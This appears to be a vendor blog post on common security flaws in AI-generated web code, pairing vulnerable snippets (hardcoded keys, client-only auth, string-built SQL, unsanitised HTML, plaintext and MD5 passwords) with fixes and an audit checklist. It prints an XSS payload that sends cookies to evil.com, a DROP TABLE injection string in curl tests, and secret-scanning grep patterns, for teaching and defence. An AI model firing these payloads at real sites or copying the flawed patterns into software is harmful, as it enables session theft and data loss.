
Why 45% of AI-Generated Code Fails Security Tests (And How to Fix It)

AI coding tools produce code with 1.88x more password vulnerabilities and 2.74x more XSS flaws. Here are the five most common security failures and how to catch them before your users do.

FinishKit Team · 13 min read

You shipped your AI-built SaaS on a Friday. By Saturday afternoon, it was on the front page of Product Hunt. Users were signing up. Stripe was pinging. You were riding the high.

Then the DM landed: "Hey, I can see everyone's data. You might want to fix this."

Your stomach drops. You check the network tab. The API endpoint returns all user records with no auth check, no row-level filtering, nothing. The AI generated a clean, functional endpoint that serves every row in the table to anyone who asks. You've been live for 18 hours.

This isn't a hypothetical. Variations of this exact scenario play out every week. And the research explains why.

The Veracode Report: AI Code's Security Problem

Veracode's 2025 GenAI Code Security Report analyzed thousands of AI-generated code samples across multiple languages. The headline number: 45% of AI-generated code contains security vulnerabilities. Not style issues. Not minor warnings. Actual exploitable security flaws.

The breakdown gets worse when you look at specific vulnerability types.

86% of AI-generated code samples failed to defend against cross-site scripting. AI code also contained 1.88x more improper password handling and 2.74x more XSS vulnerabilities compared to human-written code. (Veracode 2025 GenAI Code Security Report)

Language matters, too. Java code generated by AI had a 72% security failure rate. Python, JavaScript, and C# ranged from 38% to 45%, which is better but still alarming when you consider that nearly half the code your AI assistant writes might be exploitable.

The Cloud Security Alliance corroborates this at the design level: 62% of AI-generated code contains design flaws or known security vulnerabilities (CSA 2025 AI Code Security Study). These aren't just implementation bugs. They're architectural decisions (storing secrets in plaintext, trusting client-side state, skipping authorization entirely) baked into the foundation of the app.

The Five Most Common AI Code Security Failures

Every security audit of AI-generated code surfaces the same patterns. Here are the five that show up most often, with concrete examples of what the vulnerable code looks like and how to fix it.

1. Hardcoded Secrets

This is the most common and most preventable vulnerability in AI-generated code. AI tools pull patterns from training data, and their training data is full of tutorials that drop API keys directly into source files. Apiiro's research across Fortune 50 enterprises found a 40% increase in secrets exposure in AI-generated code (Apiiro 2025).

The AI generates this:

// AI-generated: API key right in the source
const stripe = new Stripe("sk_live_51ABC123DEF456GHI789JKL0");
 
const supabaseClient = createClient(
  "https://abc123.supabase.co",
  "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.secret_key_here"
);

Fix it:

// Fixed: keys come from environment variables
const stripe = new Stripe(process.env.STRIPE_SECRET_KEY!);
 
const supabaseClient = createClient(
  process.env.NEXT_PUBLIC_SUPABASE_URL!,
  process.env.NEXT_PUBLIC_SUPABASE_PUBLISHABLE_KEY!
);

And make sure your .gitignore actually includes .env:

# Check if .env is in .gitignore
grep -n "\.env" .gitignore
 
# If it's missing, add it
echo ".env*" >> .gitignore
 
# Scan your repo for leaked secrets
grep -rn "sk_live\|sk_test\|AKIA\|password\s*=\s*['\"]" \
  --include="*.ts" --include="*.tsx" --include="*.js" \
  src/ app/ lib/

If that grep returns results, you have a problem. If any of those files were ever committed, the secrets are in your git history even after you remove them. Rotate every exposed key immediately.
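The pattern-matching those scanners do can also be scripted. Below is a toy TypeScript sketch of the idea; the two regexes are illustrative assumptions only, and dedicated tools like gitleaks or trufflehog cover hundreds of key formats:

```typescript
// Toy secret detector mirroring the grep above. The patterns are
// illustrative assumptions; real scanners cover far more formats.
const SECRET_PATTERNS: Record<string, RegExp> = {
  stripeLiveKey: /sk_live_[A-Za-z0-9]{10,}/, // Stripe live secret key shape
  awsAccessKeyId: /AKIA[0-9A-Z]{16}/,        // AWS access key ID shape
};

function findSecrets(source: string): string[] {
  // Return the names of every pattern that matches the source text
  return Object.entries(SECRET_PATTERNS)
    .filter(([, re]) => re.test(source))
    .map(([name]) => name);
}
```

Running this over a file that instantiates Stripe with a literal `sk_live_` key flags it, while the environment-variable version passes clean.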

2. Client-Side Authorization

This is the vulnerability that sinks AI-built SaaS apps. AI tools build authorization logic into React components, checking subscription status, user roles, or feature flags on the client. The code looks correct. The UI hides the right things. But none of it is enforced.

The AI generates this:

// AI-generated: auth check only in the React component
export default function AdminDashboard() {
  const { user } = useAuth();
 
  // Admin-only data fetched client-side
  // (hooks must run before any early return)
  const { data } = useSWR("/api/admin/users", fetcher);
 
  if (user?.role !== "admin") {
    return <p>Access denied</p>;
  }
 
  return <UserTable data={data} />;
}

The problem: /api/admin/users has no auth check. Anyone can curl it.

Fix it by enforcing authorization on the server:

// Fixed: server-side auth on the API route
export async function GET(request: Request) {
  const supabase = await createClient();
  const { data: { user }, error } = await supabase.auth.getUser();
 
  if (error || !user) {
    return Response.json({ error: "Unauthorized" }, { status: 401 });
  }
 
  // Check role in the database, not from client state
  const { data: profile } = await supabase
    .from("profiles")
    .select("role")
    .eq("id", user.id)
    .single();
 
  if (profile?.role !== "admin") {
    return Response.json({ error: "Forbidden" }, { status: 403 });
  }
 
  const { data } = await supabase.from("users").select("*");
  return Response.json(data);
}

The rule is simple: if you can't enforce it on the server, it's not enforced at all. Client-side checks are UX conveniences. Server-side checks are security.

3. SQL Injection

AI-generated database queries frequently use string interpolation instead of parameterized queries. The AI writes code that works with normal input. An attacker's input is not normal.

The AI generates this:

// AI-generated: string concatenation in the query
export async function GET(request: Request) {
  const { searchParams } = new URL(request.url);
  const search = searchParams.get("search") || "";
 
  // Only as safe as the SQL inside search_users: if that function
  // concatenates its parameter into a query string, this is injectable
  const { data } = await supabase
    .rpc("search_users", {
      query: `%${search}%`
    });
 
  // Or worse, raw SQL with direct string interpolation:
  const result = await pool.query(
    `SELECT * FROM users WHERE name LIKE '%${search}%'`
  );
 
  return Response.json(data);
}

That raw SQL version? An attacker sends '; DROP TABLE users; -- and your data is gone.

Fix it:

// Fixed: parameterized queries only
export async function GET(request: Request) {
  const { searchParams } = new URL(request.url);
  const search = searchParams.get("search") || "";
 
  // Validate and sanitize input
  const sanitized = search.replace(/[%_]/g, "\\$&").slice(0, 100);
 
  // Parameterized query: the database driver handles escaping
  const result = await pool.query(
    "SELECT id, name, email FROM users WHERE name ILIKE $1 LIMIT 20",
    [`%${sanitized}%`]
  );
 
  return Response.json(result.rows);
}

If you're using Supabase, the client library handles parameterization for you through its query builder. But the moment you drop into raw SQL with .rpc() or a direct Postgres connection, you're responsible for preventing injection yourself.
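The wildcard-escaping step is worth pulling into a helper so every search endpoint uses it. A sketch of the sanitize line above (the helper name is my own; note it also escapes backslash itself, which the inline regex above does not):

```typescript
// Hypothetical helper: escape LIKE/ILIKE wildcards so user input matches
// literally inside a pattern, and cap its length.
function escapeLikePattern(input: string, maxLen = 100): string {
  // Backslash-escape \, % and _ so they lose their wildcard meaning
  return input.replace(/[\\%_]/g, "\\$&").slice(0, maxLen);
}

// Usage: pool.query("... WHERE name ILIKE $1", [`%${escapeLikePattern(q)}%`])
```

This only makes the pattern literal; the parameterized query is still what prevents injection.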

4. Cross-Site Scripting (XSS)

This is the big one statistically. 86% of AI-generated code fails to defend against XSS (Veracode 2025). AI tools render user-provided content directly into the DOM without sanitization. In React, this usually means using dangerouslySetInnerHTML without cleaning the input first.

The AI generates this:

// AI-generated: raw HTML injection
export function UserComment({ comment }: { comment: string }) {
  return (
    <div
      className="comment"
      dangerouslySetInnerHTML={{ __html: comment }}
    />
  );
}
 
// Or in a profile page:
export function UserBio({ bio }: { bio: string }) {
  return <div dangerouslySetInnerHTML={{ __html: bio }} />;
}

An attacker sets their bio to <img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)"> and every user who views their profile gets their session stolen.

Fix it:

import DOMPurify from "dompurify";
 
// Fixed: sanitize before rendering
export function UserComment({ comment }: { comment: string }) {
  const clean = DOMPurify.sanitize(comment, {
    ALLOWED_TAGS: ["b", "i", "em", "strong", "a", "p", "br"],
    ALLOWED_ATTR: ["href"],
  });
 
  return (
    <div
      className="comment"
      dangerouslySetInnerHTML={{ __html: clean }}
    />
  );
}
 
// Even better: avoid dangerouslySetInnerHTML entirely
export function UserBio({ bio }: { bio: string }) {
  // Plain text rendering, no HTML interpretation at all
  return <p className="bio">{bio}</p>;
}

The best defense against XSS is to never use dangerouslySetInnerHTML. React escapes content by default. The moment you opt out of that protection, you own the consequences.
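For intuition, here is roughly the entity escaping React performs when it renders a string as text content. This is an illustration only; rely on React's built-in escaping rather than a hand-rolled copy:

```typescript
// Illustrative only: approximately what React does automatically when
// rendering {bio} as text instead of via dangerouslySetInnerHTML.
function escapeHtml(input: string): string {
  return input
    .replace(/&/g, "&amp;")   // must run first so later entities aren't double-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}
```

An `<img onerror=...>` payload escaped this way renders as inert text instead of executing.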

5. Improper Password Handling

AI-generated auth code frequently stores passwords in plaintext or uses weak, outdated hashing. Veracode found 1.88x more improper password handling in AI code compared to human-written code. This one is particularly dangerous because it's invisible until there's a breach.

The AI generates this:

// AI-generated: plaintext password storage
export async function POST(request: Request) {
  const { email, password } = await request.json();
 
  await db.query(
    "INSERT INTO users (email, password) VALUES ($1, $2)",
    [email, password] // Stored in plaintext
  );
 
  return Response.json({ success: true });
}
 
// Or slightly better but still bad:
import { createHash } from "crypto";
 
const hashed = createHash("md5").update(password).digest("hex");

MD5 is not password hashing. It's a general-purpose hash from the early 1990s, designed for speed, which is exactly the wrong property for password storage. A modern GPU cracks MD5 hashes at billions of guesses per second.

Fix it:

import bcrypt from "bcrypt";
 
const SALT_ROUNDS = 12;
 
// Registration: hash before storing
export async function POST(request: Request) {
  const { email, password } = await request.json();
 
  // Validate password strength
  if (password.length < 8) {
    return Response.json(
      { error: "Password must be at least 8 characters" },
      { status: 400 }
    );
  }
 
  const hashedPassword = await bcrypt.hash(password, SALT_ROUNDS);
 
  await db.query(
    "INSERT INTO users (email, password_hash) VALUES ($1, $2)",
    [email, hashedPassword]
  );
 
  return Response.json({ success: true });
}
 
// Login: compare against hash
export async function verifyPassword(
  password: string,
  hash: string
): Promise<boolean> {
  return bcrypt.compare(password, hash);
}

Better yet: don't build password handling at all. Use a managed auth provider like Supabase Auth, Clerk, or Auth.js. They handle hashing, salting, rate limiting on login attempts, and breached password detection. This is one area where delegation is strictly better than doing it yourself.

Why AI Keeps Making These Mistakes

Understanding why AI produces insecure code helps you predict where the vulnerabilities will be.

Training data bias. AI models learned from millions of code samples scraped from the internet. A huge portion of that training data is tutorials, Stack Overflow answers, and example projects. Tutorials optimize for teaching concepts, not security. They hardcode API keys so the reader can follow along. They skip auth checks to keep the example focused. The AI learned these patterns and reproduces them faithfully.

No adversarial thinking. AI optimizes for "does this code work?" It does not think about "how could someone exploit this?" Security requires a fundamentally different mindset, one that considers what happens when inputs are malicious, when users lie about who they are, when requests come in faster than expected. AI has no concept of an attacker.

Context window limits. Security vulnerabilities often span multiple files. An API route might be missing auth because the middleware was supposed to handle it, but the middleware has a gap. A secret might be in .env locally but hardcoded in a config file the AI generated for deployment. These cross-file, cross-system vulnerabilities require understanding the full attack surface. AI sees one file at a time.

Pattern replication. AI copies what worked before. If the most common pattern in its training data for a database query uses string concatenation, that's what it generates. It doesn't evaluate whether the pattern is safe. It evaluates whether the pattern is common.

A Practical Security Audit for Your AI-Built App

Here's a step-by-step audit you can run in an afternoon. It won't catch everything, but it will catch the five vulnerability categories above, which account for the vast majority of AI code security issues.

Step 1: Scan for exposed secrets. Run these commands from your project root. If anything comes back, move it to environment variables and rotate the exposed key.

# Search for hardcoded API keys and secrets
grep -rn "sk_live\|sk_test\|AKIA\|secret_key\|password\s*=" \
  --include="*.ts" --include="*.tsx" --include="*.js" --include="*.env*" .
 
# Check if .env is in .gitignore
grep "\.env" .gitignore || echo "WARNING: .env not in .gitignore!"
 
# Check git history for previously committed secrets
git log --all -p --diff-filter=D -- "*.env" 2>/dev/null | head -50

Step 2: Verify auth on every API route. List all your API routes and check each one for server-side authentication.

# List all API route files
find app/api -name "route.ts" -o -name "route.js" | sort
 
# Check which routes have auth checks
grep -rL "getUser\|getSession\|getServerSession\|auth()\|getToken" app/api/

That second command lists routes without auth checks. Every route in that list is either intentionally public or a vulnerability.
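One way to make "intentionally public" explicit is to route every protected handler through a shared wrapper, so a missing auth check becomes visible at a glance. A sketch under assumptions: the names `withAuth` and `getUser` are my own, and `getUser` is injected so the wrapper stays provider-agnostic (in a real app it would wrap `supabase.auth.getUser()` or your session library):

```typescript
// Sketch: a reusable wrapper so no protected route can forget its auth check.
type User = { id: string };
type AuthedHandler = (req: Request, user: User) => Promise<Response>;

function withAuth(
  getUser: (req: Request) => Promise<User | null>, // session lookup, injected
  handler: AuthedHandler
): (req: Request) => Promise<Response> {
  return async (req) => {
    const user = await getUser(req);
    if (!user) {
      // Reject before the handler ever runs
      return Response.json({ error: "Unauthorized" }, { status: 401 });
    }
    return handler(req, user);
  };
}

// Usage in a route file:
// export const GET = withAuth(getUserFromSession, async (req, user) => { ... });
```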

Step 3: Run dependency vulnerability scans.

# Check for known vulnerabilities in dependencies
npm audit
 
# List outdated packages so you can review them for security fixes
npx npm-check-updates

Step 4: Test input validation on your endpoints. Try sending garbage to every endpoint that accepts user input.

# Test for SQL injection
curl -X GET "http://localhost:3000/api/search?q='; DROP TABLE users; --"
 
# Test for XSS in any endpoint that returns user content
curl -X POST http://localhost:3000/api/comments \
  -H "Content-Type: application/json" \
  -d '{"body": "<script>alert(1)</script>"}'
 
# Test for oversized payloads
curl -X POST http://localhost:3000/api/data \
  -H "Content-Type: application/json" \
  -d "{\"data\": \"$(python3 -c 'print("A" * 1000000)')\"}"

Step 5: Audit client-side security logic. Search for authorization checks that only exist in the frontend.

# Find client-side role/permission checks that might not be enforced server-side
grep -rn "role.*===\|isAdmin\|isPremium\|subscription" \
  --include="*.tsx" --include="*.jsx" components/ app/

Every hit in that search needs a corresponding server-side enforcement. If the component checks isPremium before showing content, the API route serving that content must also verify the subscription.
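Pairing each client-side check with a single server-side rule table makes that audit mechanical: one place to look, default deny for anything unlisted. A hypothetical sketch (the `Profile` shape and feature names are assumptions, not your schema):

```typescript
// Hypothetical server-side gate mirroring client-side isAdmin/isPremium checks.
type Profile = { role: "admin" | "user"; plan: "free" | "premium" };

const FEATURE_RULES: Record<string, (p: Profile) => boolean> = {
  "admin-dashboard": (p) => p.role === "admin",
  "premium-export": (p) => p.plan === "premium",
};

function canAccessFeature(profile: Profile, feature: string): boolean {
  const rule = FEATURE_RULES[feature];
  // Unknown features are denied by default, never silently allowed
  return rule ? rule(profile) : false;
}
```

The profile passed in should come from the database on the server, as in the admin route example earlier, never from client state.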

The 1-in-5 Stat That Should Worry Everyone

The vulnerabilities above aren't theoretical risks. They're causing real breaches right now.

1 in 5 data breaches are now caused by AI-generated code (Aikido Security 2026 State of AI Code Security Report). That number was effectively zero two years ago.

The data points are converging from every direction:

  • 69% of organizations have discovered vulnerabilities in their codebases that were directly introduced by AI coding tools (Aikido Security 2026).
  • 170 out of 1,645 Lovable-created web applications had security vulnerabilities that exposed personal data to anyone with a browser (Supabase community audit, 2025).
  • AI-generated code contains 15-18% more security vulnerabilities than human-written code across comparable projects (Opsera 2026 Software Development Analytics Report).

This isn't a future risk to prepare for. It's a current crisis. If you shipped an AI-built app in the last 12 months without a security review, the odds that it has at least one exploitable vulnerability are closer to "likely" than "possible."

The uncomfortable pattern: AI tools make it easy to build and launch fast. Speed is the selling point. But speed without security review is how you end up as the next "I can see everyone's data" horror story.

The organizations getting hit aren't just solo developers shipping side projects. They're companies with engineering teams that adopted AI coding tools without adjusting their review processes. The AI generates code that passes functional tests. It does what the spec asks. It just also does things the spec didn't account for, like serving unauthenticated requests or storing passwords in plaintext.

Close the Gap

The good news: most AI code security issues are fixable in a weekend. The five vulnerability categories in this post cover the vast majority of what goes wrong. The audit checklist above is a concrete starting point.

The better news: you don't have to do this manually every time. Tools like FinishKit scan your entire codebase, flag these exact patterns, and generate fixes as pull requests. But whether you automate it or do it by hand, the important thing is that you do it.

Security isn't a feature you add after launch. It's a prerequisite for deserving your users' trust. The bar isn't perfection. It's diligence. Scan for secrets. Enforce auth on the server. Parameterize your queries. Sanitize your inputs. Hash your passwords.

If you're looking for the broader production readiness picture beyond security, the shipping checklist covers error handling, testing, deployment, and UX polish. For a deep dive on protecting user data in Supabase specifically, the RLS guide walks through row-level security from scratch.

Your AI tool wrote the code. You're responsible for what it does. A weekend of security hardening is the difference between a product that earns trust and one that loses it. Start today.